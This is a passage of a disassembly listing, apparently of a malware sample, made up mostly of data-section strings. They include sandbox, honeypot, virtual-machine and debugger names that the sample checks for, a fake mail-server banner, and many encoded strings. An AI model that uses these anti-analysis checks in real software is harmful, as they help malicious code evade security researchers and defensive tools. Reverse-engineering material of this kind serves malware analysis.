; sub_4097B9+319�r ...
add [ecx], al
; END OF FUNCTION CHUNK FOR sub_43EFD0
; ---------------------------------------------------------------------------
db 3 dup(0)
db 43h
; ---------------------------------------------------------------------------
loc_43F01D: ; CODE XREF: .text:0043F01F�j
xor eax, eax
ja short loc_43F01D
pop es
; ---------------------------------------------------------------------------
dw 0
dd 1, 77BB1F89h, 7FCh, 1, 77C01F89h, 7FCh, 1, 655B4F02h
dd 7E7h
dword_43F048 dd 0 ; ---------------------------------------------------------------------------
sub [ecx+77h], ecx
sub ecx, [ecx-1Eh]
ja short near ptr byte_43F0A1
retf
; ---------------------------------------------------------------------------
dw 77E3h
dd 7518A747h, 77BD3143h
dword_43F060 dd 158h dword_43F064 dd 6BFFD098h, 3610A112h, 0C3463398h, 5A347EF8h, 0
; DATA XREF: sub_4097B9+255�o
dword_43F078 dd 65706970h, 736B775Ch, 637673haNetvalidatenam db 'NetValidateName',0 ; DATA XREF: sub_409EE2+15�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409EE2+A�o
; sub_417362:loc_417E6F�o
byte_43F0A1 db 3 dup(0) ; CODE XREF: .text:0043F053�j
dword_43F0A4 dd 4000500h, 7868746Bh, 0dword_43F0B0 dd 54207325h, 20505446h, 25203E2Dh, 73h ; .text:0040A4DC�o
dword_43F0C0 dd 736E495Ch, 54656469h, 5C6DhaImail8_001531N db '(IMail 8.00 153-1) NT-ESMTP Server X1',0 ; DATA XREF: sub_40A662+64�o
align 4
aNepenthes db 'nepenthes',0 ; DATA XREF: sub_40A662+5D�o
align 10h
aCurrentuser db 'currentuser',0 ; DATA XREF: sub_40A662+56�o
aVmware db 'vmware',0 ; DATA XREF: sub_40A662+4F�o
align 4
aHoneymule db 'HoneyMule',0 ; DATA XREF: sub_40A662+48�o
align 10h
aHoneyd db 'honeyd',0 ; DATA XREF: sub_40A662+41�o
align 4
aHoneyc db 'honeyc',0 ; DATA XREF: sub_40A662+3A�o
align 10h
aHoney db 'honey',0 ; DATA XREF: sub_40A662+33�o
align 4
aSnort db 'snort',0 ; DATA XREF: sub_40A662+2C�o
align 10h
aSandbox db 'Sandbox',0 ; DATA XREF: sub_40A662+25�o
aRoo db 'roo',0 ; DATA XREF: sub_40A662+1E�o
aTu4nh09smcg1hc db 'TU-4NH09SMCG1HC',0 ; DATA XREF: sub_40A662+15�o
aSandboxie db 'Sandboxie',0 ; DATA XREF: sub_40A737+59�o
align 4
aSbiedllx db 'SbieDllX',0 ; DATA XREF: sub_40A737:loc_40A77F�o
align 4
aShowtray db 'ShowTray',0 ; DATA XREF: sub_40A7C5+F1�o
align 10h
aInstallpath db 'InstallPath',0 ; DATA XREF: sub_40A7C5+D7�o
aSoftwareVmware db 'SOFTWARE\VMware, Inc.\VMware Tools',0 ; DATA XREF: sub_40A7C5+D2�o
align 10h
aDaemon db 'DAEMON',0 ; DATA XREF: sub_40A7C5:loc_40A83B�o
align 4
aIsdebuggerpres db 'IsDebuggerPresent',0 ; DATA XREF: sub_40A7C5:loc_40A7FE�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_40A7C5+1E�o
align 4
aDJstMfgyq_ db 'd/Jst/MFgyQ.',0 ; DATA XREF: sub_40A9FE+F41�o
; sub_41567F+159�o
align 4
aErwc30qfw_p0 db 'eRWc30Qfw.P0',0 ; DATA XREF: sub_40A9FE+1084�o
; sub_40A9FE+4611�o ...
align 4
a86tb1fspjg0 db '86tb/1FSpjg0',0 ; DATA XREF: sub_40A9FE+CA6�o
; sub_41567F+172�o
align 4
aPlsymAee6v1 db 'PlsYM/aEe6v1',0 ; DATA XREF: sub_40A9FE+4D0�o
; sub_41567F+17D�o
align 4
aDehziSaO0 db 'deHZI/SA//o0',0 ; DATA XREF: sub_40A9FE+22�o
; sub_40A9FE:loc_40AE0F�o ...
align 4
aOb4iqKj5ue_ db 'Ob4iQ/KJ5ue.',0 ; DATA XREF: sub_40A9FE+5E�o
; sub_40A9FE+C70�o ...
align 4
aNfknl0nqigy0 db 'NFKNL0nQigY0',0 ; DATA XREF: sub_40A9FE+E67�o
; sub_41567F+19E�o
align 4
aE0idd0rdw2u db 'e0idD0RDw2U/',0 ; DATA XREF: sub_40A9FE+C8B�o
; sub_41567F+1A9�o
align 4
aEuior0ay2w7__0 db 'EUIOR0ay2w7.',0 ; DATA XREF: sub_40A9FE+33�o
; sub_40A9FE+88C�o ...
align 4
aPdazx1odsoh0 db 'PDazX1oDSOh0',0 ; DATA XREF: sub_40A9FE+A07�o
; sub_41567F+1BF�o
align 4
aUc6wg1ovwvt1 db 'uc6Wg1OvWVt1',0 ; DATA XREF: sub_40A9FE+44�o
; sub_40A9FE:loc_40B420�o ...
align 4
aDj9owUmrbd_ db 'dJ9OW/uMRBD.',0 ; DATA XREF: sub_40A9FE+46D�o
; sub_41567F+1D8�o
align 4
aP00ls0k4t_n1 db 'P00Ls0K4t.N1',0 ; DATA XREF: sub_40A9FE+630�o
; sub_41567F+1E3�o
align 4
aL3nyw_d7tfl_ db 'l3nYW.D7Tfl.',0 ; DATA XREF: sub_40A9FE+562�o
; sub_41567F+1EE�o
align 4
aQc9zs1zgzff0 db 'Qc9zS1zGZff0',0 ; DATA XREF: sub_40A9FE+2816�o
; sub_41567F+1F9�o
align 4
aWpuwr_6yfru db 'WpuWr.6YFRU/',0 ; DATA XREF: sub_40A9FE+2844�o
; sub_41567F+204�o
align 4
a4rmbzFcic21 db '4RmBz/FCic21',0 ; DATA XREF: sub_40A9FE+2948�o
; sub_41567F+20F�o
align 4
aSc_coSwlk_ db 'SC.Co/swLK/.',0 ; DATA XREF: sub_40A9FE+296B�o
; sub_41567F+21A�o
align 4
aSud8hRsu8j1 db 'sUd8h/rsu8j1',0 ; DATA XREF: sub_40A9FE+270�o
; sub_40A9FE+4705�o ...
align 4
aJ2yyw_j09xc db 'j2yYw.J09XC/',0 ; DATA XREF: sub_40A9FE+281�o
; sub_40A9FE+47F2�o ...
align 4
a43ucs0rkqux_ db '43uCS0rkQUx.',0 ; DATA XREF: sub_40A9FE+4974�o
; sub_41567F+386�o
align 4
aJc8j0_blhir0 db 'jC8j0.blHIr0',0 ; DATA XREF: sub_40A9FE+498D�o
; sub_41567F+394�o
align 4
aPiygc_bgpyh_ db 'PIYGC.BgPyH.',0 ; DATA XREF: sub_40A9FE+4A17�o
; sub_41567F+39F�o
align 4
a7bqzu_aqz2u_ db '7bQzU.aQz2u.',0 ; DATA XREF: sub_40A9FE+4BDB�o
; sub_41567F+3AA�o
align 4
aSar5v0jloic0 db 'saR5v0JloIc0',0 ; DATA XREF: sub_40A9FE+4C1F�o
; sub_41567F+3B5�o
align 4
aX43mxEgedu_ db 'x43Mx/eGeDu.',0 ; DATA XREF: sub_40A9FE+4C9C�o
; sub_41567F+3C0�o
align 4
aIsopf_pu4ty0 db 'IsoPF.PU4tY0',0 ; DATA XREF: sub_40A9FE+4D19�o
; sub_41567F+3CB�o
align 4
a98mu_Nedn7_ db '98mu./nEdn7.',0 ; DATA XREF: sub_40A9FE+4E89�o
; sub_41567F+3D6�o
align 4
aVdirq_mjcpx1 db 'vDIrQ.MJcpx1',0 ; DATA XREF: sub_40A9FE+5021�o
; sub_41567F+3E1�o
align 4
aSad25HpR91 db 'Sad25/hP/R91',0 ; DATA XREF: sub_40A9FE+50CC�o
; sub_41567F+3EF�o
align 4
aVsz2xXqjp5 db 'Vsz2x/xqJP5/',0 ; DATA XREF: sub_40A9FE+B5E�o
; sub_41567F+3FA�o
align 4
aPnb_aBfzu60_0 db 'pNb.a/Bfzu60',0 ; DATA XREF: sub_40A9FE+1AA5�o
; sub_41567F+405�o
align 4
aI7atf_8Tag1 db 'i7Atf.8/tag1',0 ; DATA XREF: sub_40A9FE+1B74�o
; sub_41567F+410�o
align 4
aDo5oa0u5m7_ db 'dO5oA/0U5m7.',0 ; DATA XREF: sub_40A9FE+18B5�o
; sub_41567F+41B�o
align 4
aS3dyJzo6r_0 db 's3dY//JZo6r/',0 ; DATA XREF: sub_40A9FE+18A4�o
; sub_41567F+426�o
align 4
aKe3l20ufrlq0 db 'kE3L20Ufrlq0',0 ; DATA XREF: sub_40A9FE+18C6�o
; sub_41567F+431�o
align 4
aVp1weJvqbn_ db 'VP1WE/JVQbn.',0 ; DATA XREF: sub_40A9FE+FB�o
; sub_40A9FE+1C13�o ...
align 4
aUaxwg1w8vsp0qr db 'UaxWg1w8vSP0QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+1CF2�o
; sub_41567F+44A�o
align 4
aQbwgd0cfxf_ db 'qbwGd0CFxf./',0 ; DATA XREF: sub_40A9FE+114�o
; sub_40A9FE+1D0B�o ...
align 4
a2mo7g0_b0qj db '2mo7G0.B0qj/',0 ; DATA XREF: sub_40A9FE+125�o
; sub_40A9FE+1D1C�o ...
align 4
a47ff020f_0_ db '47Ff/020f.0.',0 ; DATA XREF: sub_40A9FE+A0�o
; sub_40A9FE+1D2D�o ...
align 4
aHyomeIovtv_ db 'HyOMe/iovtV.',0 ; DATA XREF: sub_40A9FE+8A�o
; sub_40A9FE+1E44�o ...
align 4
aPlsymAee6v1_0 db 'PlsYM/aEe6v1',0 ; DATA XREF: sub_40A9FE+1EEC�o
; sub_41567F+481�o
align 4
aCwxyh0ryouv1 db 'CwXYh0RYoUv1',0 ; DATA XREF: sub_40A9FE+1F2B�o
; sub_41567F+48C�o
align 4
aEavyh_ic0dc0 db 'eAvYh.IC0dc0',0 ; DATA XREF: sub_40A9FE+1F67�o
; sub_41567F+497�o
align 4
aUz3rf_vtkug1 db 'uz3rf.VTKug1',0 ; DATA XREF: sub_40A9FE+2022�o
; sub_41567F+4A5�o
align 4
aMaeyv0bdsgj0 db 'MAEyv0BdSGj0',0 ; DATA XREF: sub_41567F+4B0�o
align 4
aI3ncg_v5u4g_ db 'I3nCG.v5U4g.',0 ; DATA XREF: sub_41567F+4BB�o
align 4
a9bwj__lz2my0 db '9bWj..lZ2My0',0 ; DATA XREF: sub_40A9FE+136�o
; sub_40A9FE+2159�o ...
align 4
aRiocl1kztwo0 db 'rioCl1kzTWO0',0 ; DATA XREF: sub_40A9FE+292�o
; sub_40A9FE+1725�o ...
align 4
a_swwg1hqeii1 db '.SWwg1hqeiI1',0 ; DATA XREF: sub_40A9FE+188B�o
; sub_41567F+4DC�o
align 4
aG3obv_r6j7h db 'g3obv.r6j7H/',0 ; DATA XREF: sub_40A9FE+B6�o
; sub_40A9FE+F2F�o ...
align 4
aM5spx_qp7lx_ db 'M5sPX.Qp7Lx.',0 ; DATA XREF: sub_40A9FE+CC�o
; sub_40A9FE+10AD�o ...
align 4
aItx_n_wpamx_ db 'ITx.N.WPAmx.',0 ; DATA XREF: sub_40A9FE+1160�o
; sub_41567F+500�o
align 4
aLndk50vzcqw0 db 'LNdk50vzCqW0',0 ; DATA XREF: sub_40A9FE+1407�o
; sub_41567F+50B�o
align 4
a9ljbh07crkd_ db '9lJBH07crkD.',0 ; DATA XREF: sub_40A9FE+E2�o
; sub_40A9FE+15E1�o ...
align 4
aAjttz06ztse1 db 'ajTtz06Ztse1',0 ; DATA XREF: sub_40A9FE+230C�o
; sub_41567F+521�o
align 4
aUn3hk0sn58o db 'uN3hk0sn58o/',0 ; DATA XREF: sub_40A9FE+232F�o
; sub_41567F+52C�o
align 4
aQrn4z10ge1i1 db 'QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+235E�o
; sub_41567F+537�o
align 4
aBvuso0ed3mw db 'bVUSO0ed3MW/',0 ; DATA XREF: sub_40A9FE+2380�o
; sub_41567F+542�o
align 4
aM1d_716jg1r1 db 'M1d.716Jg1r1',0 ; DATA XREF: sub_40A9FE+244C�o
; sub_41567F+54D�o
align 4
a6x2ka0buubb_ db '6x2Ka0buUbB.',0 ; DATA XREF: sub_40A9FE+2883�o
; sub_41567F+55B�o
align 4
aUqyil_iyvpi_ db 'uQYiL.iYvpI.',0 ; DATA XREF: sub_40A9FE+5A1C�o
; sub_41567F+566�o
align 4
a4qyyh1q2ps1 db '4QyYH1q/2ps1',0 ; DATA XREF: sub_40A9FE+5C11�o
; sub_41567F+571�o
align 4
aZgidu12tiv0 db 'ZGidU12tiV0/',0 ; DATA XREF: sub_40A9FE+5CD2�o
; sub_41567F+57C�o
align 4
aHgcrw_cwuf5_ db 'HGCRW.CWUF5.',0 ; DATA XREF: sub_40A9FE+5D06�o
; sub_41567F+587�o
align 4
aGztle_nhywf db 'gzTlE.nhywf/',0 ; DATA XREF: sub_40A9FE+5D26�o
; sub_41567F+592�o
align 4
aTvjro1ubgtg1 db 'TVJrO1uBGtg1',0 ; DATA XREF: sub_40A9FE+5DFA�o
; sub_41567F+59D�o
align 4
aL80reUvcue1 db 'l80re/UvCUe1',0 ; DATA XREF: sub_40A9FE+5DA6�o
; sub_41567F+5A8�o
align 4
aH1cmq0wqw5c_ db 'h1cMQ0wQw5C.',0 ; DATA XREF: sub_40A9FE+15F�o
; sub_40A9FE+5E5F�o ...
align 4
aVxa_uCdd7s0 db 'VXA.u/cDD7S0',0 ; DATA XREF: sub_40A9FE+5E46�o
; sub_41567F+5B6�o
align 4
aSxytb1_eejq_ db 'SXYtb1.EEjQ.',0 ; DATA XREF: sub_40A9FE+170�o
; sub_40A9FE+642C�o ...
align 4
aVb1r0N_arr0 db 'vB1r0/N.Arr0',0 ; DATA XREF: sub_40A9FE+181�o
; sub_40A9FE+643D�o ...
align 4
a8im6i__c829_ db '8Im6i..C829.',0 ; DATA XREF: sub_40A9FE+192�o
; sub_40A9FE+644E�o ...
align 4
aTiyj208fhvn_ db 'tIYj208FHvN.',0 ; DATA XREF: sub_40A9FE+1A3�o
; sub_40A9FE+645F�o ...
align 4
a5ngN0zjh2i1 db '5nG/N0ZJh2i1',0 ; DATA XREF: sub_40A9FE+1B4�o
; sub_40A9FE+6470�o ...
align 4
aMdf9n0kzpx60 db 'mdf9n0kzPX60',0 ; DATA XREF: sub_40A9FE+1C5�o
; sub_40A9FE+6481�o ...
align 4
aAtfv_jgk0x1 db '/ATfv.jgK0X1',0 ; DATA XREF: sub_40A9FE+1D6�o
; sub_40A9FE+6492�o ...
align 4
aFu6k10irsc1 db 'fu6k10iRsc/1',0 ; DATA XREF: sub_40A9FE+1E7�o
; sub_40A9FE+64A3�o ...
align 4
a_luua_bruje0 db '.lUua.bruje0',0 ; DATA XREF: sub_40A9FE+1F8�o
; sub_40A9FE+64B4�o ...
align 4
aKzqshDhric_ db 'kzqSH/dhRIc.',0 ; DATA XREF: sub_40A9FE+66A5�o
; sub_41567F+632�o
align 4
aUycsBekwp0 db '/uYcs/BEKWP0',0 ; DATA XREF: sub_40A9FE+211�o
; sub_40A9FE+66BE�o ...
align 4
aWwfbf_0ptze_ db 'WWFBf.0ptzE.',0 ; DATA XREF: sub_40A9FE+67EA�o
; sub_41567F+648�o
align 4
aFhzdv1ootfg0 db 'fhzdV1OotFg0',0 ; DATA XREF: sub_40A9FE+22A�o
; sub_40A9FE+6803�o ...
align 4
aUmk7x0pwyw9Qrn db 'Umk7x0PwyW9/QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+6959�o
; sub_41567F+65E�o
align 4
aLees11vpbnf0 db 'LeEs11vPbnf0',0 ; DATA XREF: sub_40A9FE+2A10�o
; sub_41567F+228�o
align 4
aLbjvg0r_qmb_ db 'lbJVg0r.qMb.',0 ; DATA XREF: sub_40A9FE+2A2F�o
; sub_41567F+233�o
align 4
aA52n11svyfw0 db 'A52N11SVYFw0',0 ; DATA XREF: sub_40A9FE+2B22�o
; sub_41567F+23E�o
align 4
aHj6vo0jrp9q0 db 'Hj6vo0JRP9Q0',0 ; DATA XREF: sub_40A9FE+2BED�o
; sub_41567F+249�o
align 4
aR7wrsQhek_0 db 'r7WRs/qHek.0',0 ; DATA XREF: sub_40A9FE+2C9B�o
; sub_41567F+254�o
align 4
aDuzcb0kgssv0 db 'DuzCb0KgSsv0',0 ; DATA XREF: sub_40A9FE+3236�o
; sub_41567F+25F�o
align 4
aDqjso_47pdb db 'dQJSO.47pdb/',0 ; DATA XREF: sub_40A9FE+344C�o
; sub_41567F+26A�o
align 4
aK9vUKkutm db 'K9V/U/KkuTM/',0 ; DATA XREF: sub_40A9FE+3513�o
; sub_41567F+275�o
align 4
a7yfnz0pw11s1 db '7yfnz0PW11s1',0 ; DATA XREF: sub_40A9FE+35C1�o
; sub_41567F+283�o
align 4
aNq_as1z1sit db 'nQ.As1Z1SIt/',0 ; DATA XREF: sub_40A9FE+366F�o
; sub_41567F+28E�o
align 4
aUn3hk0sn58o_0 db 'uN3hk0sn58o/',0 ; DATA XREF: sub_40A9FE+36AD�o
; sub_41567F+299�o
align 4
aQrn4z10ge1i1_0 db 'QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+371C�o
; sub_41567F+2A4�o
align 4
aIegud0v_5_ db 'iEguD0V/.5/.',0 ; DATA XREF: sub_40A9FE+3757�o
; sub_41567F+2AF�o
align 4
aFc9kk1jx11g_ db 'fc9Kk1jX11G.',0 ; DATA XREF: sub_40A9FE+379A�o
; sub_41567F+2BA�o
align 4
aDnjq8Ze3zw db 'DnjQ8/ze3ZW/',0 ; DATA XREF: sub_40A9FE+3807�o
; sub_41567F+2C5�o
align 4
aEwqxaOc1t_ db 'EWqxA//oC1T.',0 ; DATA XREF: sub_40A9FE+395B�o
; sub_41567F+2D0�o
align 4
aJiatz0xsump1 db 'JIAtz0xSuMp1',0 ; DATA XREF: sub_40A9FE+3D36�o
; sub_41567F+2DE�o
align 4
aVi0qa1mvfro1 db 'VI0QA1mvfro1',0 ; DATA XREF: sub_40A9FE+3E33�o
; sub_41567F+2E9�o
align 4
aW3gp6_13acy1 db 'W3GP6.13AcY1',0 ; DATA XREF: sub_40A9FE+3F1F�o
; sub_41567F+2F4�o
align 4
aE8qiq0hukv9 db 'e8qiq0Hukv9/',0 ; DATA XREF: sub_40A9FE+3F65�o
; sub_41567F+2FF�o
align 4
a18rjk_sa2je db '18Rjk.sa2JE/',0 ; DATA XREF: sub_40A9FE+3FD5�o
; sub_41567F+30A�o
align 4
aLjAmKzrtp1 db 'lJ/am/kZRtP1',0 ; DATA XREF: sub_40A9FE+40A5�o
; sub_41567F+315�o
align 4
aXzaru0amxhi_ db 'XZArU0aMxhi.',0 ; DATA XREF: sub_40A9FE+4198�o
; sub_41567F+320�o
align 4
aRa7e2Hhxpf0 db 'rA7E2/hHXPf0',0 ; DATA XREF: sub_40A9FE+4281�o
; sub_41567F+32B�o
align 4
aRp4sr11cvr1 db 'Rp4sR11CvR1/',0 ; DATA XREF: sub_40A9FE+439D�o
; sub_41567F+339�o
align 4
aZqrvt0t6nmz_ db 'ZqrVt0t6nmZ.',0 ; DATA XREF: sub_40A9FE+44CC�o
; sub_41567F+344�o
align 4
a1shta0bzfwk1 db '1ShtA0bzFwk1',0 ; DATA XREF: sub_40A9FE+457A�o
; sub_41567F+34F�o
align 4
aAzcsp_hkilo_ db 'AZcsP.hkiLO.',0 ; DATA XREF: sub_40A9FE+45DE�o
; sub_41567F+35A�o
align 4
aFepmfZswfd db 'FEpMF/ZswFD/',0 ; DATA XREF: sub_40A9FE+465F�o
; sub_41567F+365�o
align 4
aHpmch0pbq800 db 'HPmCH0PbQ800',0 ; DATA XREF: sub_40A9FE+51A3�o
; sub_41567F+66C�o
align 4
aUfbss0cbo8c__0 db 'uFbSS0Cbo8C.',0 ; DATA XREF: sub_40A9FE+243�o
; sub_40A9FE+5594�o ...
align 4
aNoazx1alvg0 db 'NoaZx1Alvg/0',0 ; DATA XREF: sub_40A9FE+257�o
; sub_40A9FE+578D�o ...
align 4
a7fugu_n0u2m1 db '7FUgU.N0U2m1',0 ; DATA XREF: sub_40A9FE+2AB�o
; sub_40A9FE+6972�o ...
align 4
aW3dwl46o0u0 db 'w3dWL/46o0u0',0 ; DATA XREF: sub_40A9FE+6BA2�o
; sub_41567F+698�o
align 4
aUbqs_hzpkh1 db '/uBQS.HZPkh1',0 ; DATA XREF: sub_40A9FE+2C2�o
; sub_40A9FE+6BB9�o ...
align 4
a6x7zf1eztny_ db '6x7zf1EztnY.',0 ; DATA XREF: sub_40A9FE+2D3�o
; sub_40A9FE+6BCA�o ...
align 4
a7otcu0fic6v0 db '7otcU0FiC6V0',0 ; DATA XREF: sub_40A9FE+2F5�o
; sub_40A9FE+6BEC�o ...
align 4
aFyflu0ji3xh_ db 'FyFlU0jI3XH.',0 ; DATA XREF: sub_40A9FE+2E4�o
; sub_40A9FE+6BDB�o ...
align 4
aDnjyk0fwki__ db 'dnjYk0fWkI..',0 ; DATA XREF: sub_40A9FE+6BFD�o
; sub_41567F+6D2�o
align 4
aXmz20Gjkq db 'xMz20//gJkQ/',0 ; DATA XREF: sub_40A9FE+306�o
; sub_40A9FE+6C14�o ...
align 4
aNhr6r0qsk450 db 'nHr6r0qsk450',0 ; DATA XREF: sub_40A9FE+6E2D�o
; sub_41567F+6E8�o
align 4
aX_62c_3ldcp db 'X.62C.3LDCP/',0 ; DATA XREF: sub_40A9FE+31D�o
; sub_40A9FE+7784�o ...
align 4
aWt4rnWgl6v_ db 'wt4Rn/WGL6V.',0 ; DATA XREF: sub_40A9FE+79BD�o
; sub_41567F+6FE�o
align 4
aImvbw1shwxq0 db 'iMvbW1SHwxQ0',0 ; DATA XREF: sub_40A9FE+334�o
; sub_40A9FE+7555�o ...
align 4
a4h4m_q_guy_ db '4h4m/.Q.GUy.',0 ; DATA XREF: sub_40A9FE+776D�o
; sub_41567F+714�o
align 4
aPsern1aagh6_ db 'pSern1AAGh6.',0 ; DATA XREF: sub_40A9FE+35C�o
; sub_40A9FE+7085�o ...
align 4
aXkg84_cesgs_ db 'XkG84.cESgs.',0 ; DATA XREF: sub_40A9FE+369�o
; sub_40A9FE+7220�o ...
align 4
aUyfog_dvvny0 db 'UyfOG.DvVnY0',0 ; DATA XREF: sub_40A9FE+34B�o
; sub_40A9FE+6E44�o ...
align 4
aP06vqBfbmo_ db 'p06vq/BFBMo.',0 ; DATA XREF: sub_40A9FE+376�o
; sub_40A9FE+73CB�o ...
align 4
a3vvsv1vurua db '3VVsV1VuRUA/',0 ; DATA XREF: sub_40A9FE+753E�o
; sub_41567F+74E�o
align 4
aW1w2v121jsp_ db 'w1w2V121JSP.',0 ; DATA XREF: sub_40A9FE+383�o
; sub_40A9FE+79D4�o ...
align 4
aVz62d1m0yya db 'Vz62d1m0Yya/',0 ; DATA XREF: sub_40A9FE+7B5E�o
; sub_41567F+764�o
align 4
aF4c9z1ubcg80 db 'F4c9z1UBCg80',0 ; DATA XREF: sub_40A9FE+7B6F�o
; sub_41567F+76F�o
align 4
a2yclo0srxpi db '2YClO0SRxpi/',0 ; DATA XREF: sub_40A9FE+7CD5�o
; sub_41567F+77D�o
align 4
aH3yh9_xq_s2_ db 'h3YH9.Xq.S2.',0 ; DATA XREF: sub_40A9FE+7CEC�o
; sub_41567F+788�o
align 4
aIwbkf0o1om6Qrn db 'IwBKf0O1Om6/QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+7E9B�o
; sub_41567F+793�o
align 10h
aKmdie1uwntq db 'KmdIe1UwntQ/',0 ; DATA XREF: sub_40A9FE+3A4�o
; sub_40A9FE+8142�o ...
align 10h
aUpx0wCz2ei0qrn db 'UPx0W/cz2EI0QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+8291�o
; sub_41567F+7A9�o
align 4
aV6jbh0k4uD_ db 'V6jBH0k4u/d.',0 ; DATA XREF: sub_40A9FE+3BD�o
; sub_40A9FE+82C3�o ...
align 4
aB2smo_whkew_qr db 'B2smo.WHkeW.QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+836E�o
; sub_41567F+7BF�o
align 4
aVxg7n_qbmg90aa db 'vXG7N.qBMG90aA/Td0EX07M1',0 ; DATA XREF: sub_40A9FE+83C1�o
; sub_41567F+7CA�o
align 4
aEm42x_1iszi1 db 'Em42x.1IsZI1',0 ; DATA XREF: sub_40A9FE+397�o
; sub_40A9FE+7EB4�o ...
align 4
aErnniHm17t1qrn db 'ERNNi/HM17T1QRn4z10ge1I1',0 ; DATA XREF: sub_40A9FE+8119�o
; sub_41567F+7E3�o
align 10h
aQ5l5f_2to_60 db 'q5l5f.2TO.60',0 ; DATA XREF: sub_40A9FE+85D7�o
; sub_40A9FE+8619�o ...
align 10h
aJbkl4Fbwcf1 db 'jBKL4/FbWCF1',0 ; DATA XREF: sub_40A9FE+85E4�o
; sub_40A9FE+862D�o ...
align 10h
aW3gp6_13acy1_0 db 'W3GP6.13AcY1',0 ; DATA XREF: sub_40A9FE+8642�o
; sub_41567F+804�o
align 10h
aM08se_kt9td1 db 'M08SE.Kt9tD1',0 ; DATA XREF: sub_40A9FE+872B�o
; sub_41567F+80F�o
align 10h
a3eowx2ocng db '3eowX/2OCnG/',0 ; DATA XREF: sub_40A9FE+8805�o
; sub_41567F+81A�o
align 10h
aS3dyJzo6r db 's3dY//JZo6r/',0 ; DATA XREF: sub_40A9FE+894D�o
; sub_41567F+825�o
align 10h
aUwher1dagd80 db 'UWher1DAGD80',0 ; DATA XREF: sub_40A9FE+8986�o
; sub_41567F+833�o
align 10h
aPnb_aBfzu60 db 'pNb.a/Bfzu60',0 ; DATA XREF: sub_40A9FE+89BF�o
; sub_41567F+83E�o
align 10h
aZu2s6_o7_yt db 'Zu2s6.O7.yt/',0 ; DATA XREF: sub_40A9FE+89D5�o
; sub_41567F+849�o
align 10h
a4hftz6holr db '4hftZ/6HOlR/',0 ; DATA XREF: sub_40A9FE+8A21�o
; sub_41567F+854�o
align 10h
aYqrdp_9rf4u0 db 'yqrdP.9rF4U0',0 ; DATA XREF: sub_40A9FE+8A76�o
; sub_41567F+85F�o
align 10h
a1uyis15kh_n1 db '1UyIs15KH.n1',0 ; DATA XREF: sub_40A9FE+8ABC�o
; sub_41567F+86A�o
align 10h
a9ljbh07crkd__0 db '9lJBH07crkD.',0 ; DATA XREF: sub_40A9FE+8B02�o
; sub_41567F+875�o
align 10h
aD0ron_ctdg0_ db 'D0roN.CTDg0.',0 ; DATA XREF: sub_40A9FE+8B19�o
; sub_40A9FE+8B8D�o ...
align 10h
aFr8ri0f9nfz_ db 'fr8ri0f9NfZ.',0 ; DATA XREF: sub_40A9FE+8B37�o
; sub_40A9FE+8BAF�o ...
align 10h
aWbzcx0Dknt_ db 'wbZcx0/Dknt.',0 ; DATA XREF: sub_40A9FE+8B55�o
; sub_40A9FE+8BD1�o ...
align 10h
aNyjsr1cv5ch0 db 'NyJsR1cV5CH0',0 ; DATA XREF: sub_40A9FE+8C00�o
; sub_41567F+8A4�o
align 10h
aI6sd4ctzn0 db '/I6sD/4CTzn0',0 ; DATA XREF: sub_40A9FE+8F00�o
; sub_41567F+8AF�o
align 10h
aWrlthN3uh_1 db 'WRlth/n3Uh.1',0 ; DATA XREF: sub_40A9FE+8FAB�o
; sub_41567F+8BA�o
align 10h
aYqjsn0wtutn1 db 'yQJsn0wtUtn1',0 ; DATA XREF: sub_40A9FE+906D�o
; sub_41567F+8C5�o
align 10h
aTy2nt0oi2yk db 'ty2nT0oI2YK/',0 ; DATA XREF: sub_40A9FE+106�o
; sub_40A9FE+421�o ...
align 10h
a6h4nn1igjm60 db '6h4NN1IGJm60',0 ; DATA XREF: sub_40A9FE:loc_40CD94�o
; sub_40A9FE+240C�o ...
align 10h
aUr6ne_mot50_ db 'Ur6ne.MOT50.',0 ; DATA XREF: sub_40A9FE+2703�o
; sub_40A9FE+2749�o ...
align 10h
aHm1h_049e4o db 'Hm1H.049e4O/',0 ; DATA XREF: sub_40A9FE+299A�o
; sub_41567F+90A�o ...
align 10h
aWj27_1belx20 db 'wj27.1Belx20',0 ; DATA XREF: sub_41567F+915�o
; sub_41BE01+355�o
align 10h
aPrttt0s3ag916n db 'pRTtT0s3aG916N5aw.affEY1',0 ; DATA XREF: sub_41567F+8FF�o
align 4
aAl_N0kenp20 db 'Al./N0Kenp20',0 ; DATA XREF: sub_40A9FE+95�o
; sub_40A9FE+AB�o ...
align 4
aFfec81uznt81 db 'fFEC81UzNT81',0 ; DATA XREF: sub_40A9FE:loc_40AE03�o
; sub_40A9FE+9DDC�o ...
align 4
aJvatg1988z81 db 'jVATg1988z81',0 ; DATA XREF: sub_40A9FE+AA3�o
; sub_40A9FE+9E4F�o ...
align 4
aMflx2_qu4vy_ db 'mflX2.QU4VY.',0 ; DATA XREF: .text:00401909�o
; sub_401990+F�o ...
align 4
aXlpyr1anpgm0 db 'xLpyR1aNPGm0',0 ; DATA XREF: sub_407E4B+72�o
; sub_40A9FE+21C�o ...
align 4
aWpukb_0uioaOfu db 'WPUkb.0uIoa/OFUur11TNYw0',0 ; DATA XREF: .text:0040A4A8�o
; .text:0040A4D1�o ...
align 4
aC4dd9_nojvo1 db 'C4dD9.nojvO1',0 ; DATA XREF: sub_40A9FE+5BBF�o
; sub_40A9FE:loc_410603�o ...
align 4
aJt17j1imtvd1 db 'jt17J1ImTVD1',0 ; DATA XREF: sub_4020BA+CE�o
; sub_402CE9+489�o ...
align 4
aLtlec18us5q0 db 'LTLec18US5q0',0 ; DATA XREF: sub_40A9FE+C1�o
; sub_40A9FE+F61�o ...
align 4
a6atss0dycwf_6n db '6atSs0dyCWF.6N5aw.affEY1',0 ; DATA XREF: sub_40A9FE+D7�o
; sub_40A9FE+10E3�o ...
align 4
a7_pak0onymn7ra db '7.PaK0OnymN/7Razv/1FefF.',0 ; DATA XREF: sub_40A9FE+ED�o
; sub_40A9FE+15FF�o ...
align 10h
aWhdag1glagf_ db 'WHdAg1glAgf.',0 ; DATA XREF: sub_40A9FE:loc_40ADEB�o
; sub_40A9FE+4781�o ...
